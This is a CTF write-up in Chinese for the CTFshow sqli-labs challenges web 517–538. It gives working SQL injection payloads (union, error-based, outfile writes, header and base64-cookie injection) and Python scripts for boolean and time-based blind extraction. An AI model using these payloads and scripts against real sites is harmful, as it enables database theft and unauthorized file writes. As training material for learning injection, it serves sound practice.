CTFSHOW (sqli-labs)
web 517
字符型sql注入,查询字段为3
?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+ #查询所有的数据库 ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow' --+ #查询ctfshow数据库中所有的表 ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctfshow' and table_name='flag' --+ #查询flag表中的所有列 ?id=-1' union select 1,flag,3 from ctfshow.flag --+ #查询flag列中的数据
web 518
数字型sql注入,查询字段为3
?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+ #查询所有的数据库 ?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'--+ #查询ctfshow数据库中的表 ?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctfshow' and table_name='flagaa'--+ #查询flagaa表中的所有列 ?id=-1 union select 1,flagac,3 from ctfshow.flagaa--+ #查询flagac列中的数据
web 519
闭合符号为:'),查询字段为3
?id=-1') union select 1,group_concat(schema_name),3 from information_schema.schemata --+ #查询所有的数据库 ?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow' --+ #查询ctfshow数据库中的所有的表 ?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctfshow' and table_name='flagaanec' --+ #查询flagaanec表中的所有列 ?id=-1') union select 1,flagaca,3 from ctfshow.flagaanec --+ #查询flagaca列中的数据
web 520
闭合符号")
?id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata --+ #查询所有的数据库 ?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow' --+ 查询ctfshow数据库中的所有的表 ?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctfshow' and table_name='flagsf' --+ #查询flagsf表中的所有列 ?id=-1") union select 1,flag23,3 from ctfshow.flagsf --+ #查询flag23列中的数据
web 521
sql bool盲注
脚本
import requests flag="" i = 0 while True: i = i+1 low = 32 high =127 while low < high: mid = (low+high)//2 #url = f"http://bbd62807-74a1-427b-bdb6-13b06ba54c08.challenge.ctf.show/?id=1' and ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid} --+" #url = f"http://bbd62807-74a1-427b-bdb6-13b06ba54c08.challenge.ctf.show/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid} --+" #url = f"http://bbd62807-74a1-427b-bdb6-13b06ba54c08.challenge.ctf.show/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagpuck'),{i},1))>{mid} --+" url = f"http://bbd62807-74a1-427b-bdb6-13b06ba54c08.challenge.ctf.show/?id=1' and ascii(substr((select flag33 from ctfshow.flagpuck),{i},1))>{mid} --+" r=requests.get(url=url) if "You are in..........." in r.text: low = mid+1 else: high = mid if low !=32: flag+=chr(low) else: break print(flag)
web 522
sql bool盲注
闭合符号为"
import requests flag="" i = 0 while True: i = i+1 low = 32 high =127 while low < high: mid = (low+high)//2 #url = f'http://297b22d3-b874-407c-8f91-1490960e5f3d.challenge.ctf.show/?id=1" and ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid} --+' #url = f'http://297b22d3-b874-407c-8f91-1490960e5f3d.challenge.ctf.show/?id=1" and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid} --+' #url = f'http://297b22d3-b874-407c-8f91-1490960e5f3d.challenge.ctf.show/?id=1" and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="ctfshow" and table_name="flagpa"),{i},1))>{mid} --+' url = f'http://297b22d3-b874-407c-8f91-1490960e5f3d.challenge.ctf.show/?id=1" and ascii(substr((select flag3a3 from ctfshow.flagpa),{i},1))>{mid} --+' r=requests.get(url=url) if "You are in..........." in r.text: low = mid+1 else: high = mid if low !=32: flag+=chr(low) else: break print(flag)
web 523
这道sql注入题需要写文件,注意这里的话写进去文件好像是不可以进行覆盖,所以是1.txt 2.txt 3.txt 这样
?id=1')) union select 1,2,group_concat(schema_name) from information_schema.schemata into outfile "/var/www/html/1.txt" --+ 将所有的数据库写入1.txt文件内 ?id=1')) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' into outfile "/var/www/html/2.txt" --+ 将ctfshow数据库中的所有表写入2.txt文件内 ?id=1')) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagdk' into outfile "/var/www/html/3.txt" --+ #将flagdk表中的所有列写入3.txt ?id=1')) union select 1,2,flag43 from ctfshow.flagdk into outfile "/var/www/html/4.txt" --+ #将flag写入4.txt
web 524
还是bool 盲注,脚本就用上面的盲注脚本
web 525
时间盲注,脚本:
import requests flag="" i=0 while True: i += 1 low = 32 high =127 while low < high: mid = (low+high)//2 #url=f"http://7c83f3a0-8c78-438c-b049-e1ce771b4db8.challenge.ctf.show/?id=1%27%20and%20if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid}),sleep(0.4),0) --+" #url=f"http://7c83f3a0-8c78-438c-b049-e1ce771b4db8.challenge.ctf.show/?id=1%27%20and%20if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid}),sleep(0.4),0) --+" #url=f"http://7c83f3a0-8c78-438c-b049-e1ce771b4db8.challenge.ctf.show/?id=1%27%20and%20if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagug'),{i},1))>{mid}),sleep(0.4),0) --+" url=f"http://7c83f3a0-8c78-438c-b049-e1ce771b4db8.challenge.ctf.show/?id=1%27%20and%20if((ascii(substr((select flag4a23 from ctfshow.flagug),{i},1))>{mid}),sleep(0.4),0) --+" r=requests.get(url=url) try: r=requests.get(url=url,timeout=0.3) high =mid except: low =mid +1 if low!= 32: flag+=chr(low) else: break print(flag)web 526
用 " 进行闭合,修改一下上面的脚本就可以了。
web 527
post 联合注入
uname=1' union select group_concat(schema_name),2 from information_schema.schemata --+&passwd=123&submit=Submit #获得所有的数据库 uname=1' union select group_concat(table_name),2 from information_schema.tables where table_schema='ctfshow' --+&passwd=123&submit=Submit #获取数据库中的所有的表 uname=1' union select group_concat(column_name),2 from information_schema.columns where table_schema='ctfshow' and table_name='flagugsd'--+&passwd=123&submit=Submit #获取flagugsd表中的所有列 uname=1' union select flag43s,2 from ctfshow.flagugsd --+&passwd=123&submit=Submit #获取flag的值
web 528
post 联合注入 闭合符号为")
web 529
post bool盲注,闭合符号 ') ,通过图片返回的俩种不同名字来判断,成功为flag.jpg,失败为slap.jpg。
import requests if __name__ == '__main__': url = 'http://9489bc4d-ac59-47ef-ae2f-274db50f220a.challenge.ctf.show/' result = '' i = 0 while True: i = i + 1 low = 32 high = 127 while low < high: mid = (low + high) // 2 # payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)' # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)' # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flag"),{i},1))>{mid},1,0)' payload = f'if(ascii(substr((select group_concat(flag4) from ctfshow.flag),{i},1))>{mid},1,0)' # print(payload) data = { 'uname': f"admin') and {payload}#", 'passwd': '123' } # print(data['uname']) r = requests.post(url=url, data=data) if 'flag.jpg' in r.text: low = mid + 1 else: high = mid if low != 32: result += chr(low) else: break print(result)
web 530
和之前的一样是post bool盲注,闭合符号是"
脚本如下
import requests flag ="" i = 0 while True: i = i + 1 low = 32 high = 127 while low < high: mid = (low + high) // 2 url = "http://fbd99d37-9d1e-4e77-8b7b-5fed381bac56.challenge.ctf.show/" #payload=f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)' #payload=f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)' #payload=f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="ctfshow" and table_name="flagb"),{i},1))>{mid},1,0)' payload=f'if(ascii(substr((select flag4s from ctfshow.flagb),{i},1))>{mid},1,0)' data = { 'uname': f'admin" and {payload}#', 'passwd': '123' } #print(data['uname']) r = requests.post(url=url, data=data) if 'flag.jpg' in r.text: low = mid + 1 else: high = mid if low != 32: flag += chr(low) else: break print(flag)
web 531
用 ' 闭合,但是把报错关了,所以需要不断的尝试闭合符。脚本还是上面的,修改一下就可以了。
web 532
这个需要时间盲注
web 533
报错注入
uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)-- 爆出数据库 uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),0x7e),1)--+ 爆出表 uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'),0x7e),1)--+ 爆出字段 uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select flag4 from ctfshow.flag),0x7e),1)--+ uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select right(flag4,24) from ctfshow.flag),0x7e),1)--+ 获得flag
web 534
账号密码都使用DUMB登陆后会返回User-Agent,所有猜测ua注入
payload:
'and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1) and' ' and updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema='ctfshow'),0x7e),1) and ' ' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'),0x7e),1) and ' ' and updatexml(1,concat(0x7e,(select group_concat(flag4) from ctfshow.flag),0x7e),1) and ' ' and updatexml(1,concat(0x7e,(select right(group_concat(flag4),20) from ctfshow.flag),0x7e),1) and '
这里的话是没有那个注释符号--+和#的,这里需要最后有个单引号进行闭合。
web 535
referer报错注入,和上面的payload一样,这里就不写了。
web 536
coolie报错注入。
Dumb' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),0x7e),1)--+ Dumb' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'),0x7e),1)--+ Dumb' and updatexml(1,concat(0x7e,(select flag4 from ctfshow.flag),0x7e),1)--+ Dumb' and updatexml(1,concat(0x7e,(select right(flag4,20) from ctfshow.flag),0x7e),1)--+
web 537
闭合方式 ')
Cookie: uname=RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdjdGZzaG93JyksMHg3ZSkpLS0gLXdxZQ== Cookie: uname=RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9J2N0ZnNob3cnIGFuZCB0YWJsZV9uYW1lPSdmbGFnJyksMHg3ZSkpLS0gLXdxZQ== Cookie: uname=RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChmbGFnNCkgZnJvbSBjdGZzaG93LmZsYWcpLDB4N2UpKS0tIC13cWU= Cookie: uname=RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHJpZ2h0KGdyb3VwX2NvbmNhdChmbGFnNCksMjApIGZyb20gY3Rmc2hvdy5mbGFnKSwweDdlKSktLSAtd3F
web 538
"闭合
Cookie: uname=RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J2N0ZnNob3cnKSwweDdlKSktLSAtd3Fl Cookie: uname=RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nY3Rmc2hvdycgYW5kIHRhYmxlX25hbWU9J2ZsYWcnKSwweDdlKSktLSAtd3Fl Cookie: uname=RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGZsYWc0KSBmcm9tIGN0ZnNob3cuZmxhZyksMHg3ZSkpLS0gLXdxZQ== Cookie: uname=RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgcmlnaHQoZ3JvdXBfY29uY2F0KGZsYWc0KSwyMCkgZnJvbSBjdGZzaG93LmZsYWcpLDB4N2UpKS0tIC13cWU=
“有人见星辰,有人见尘埃”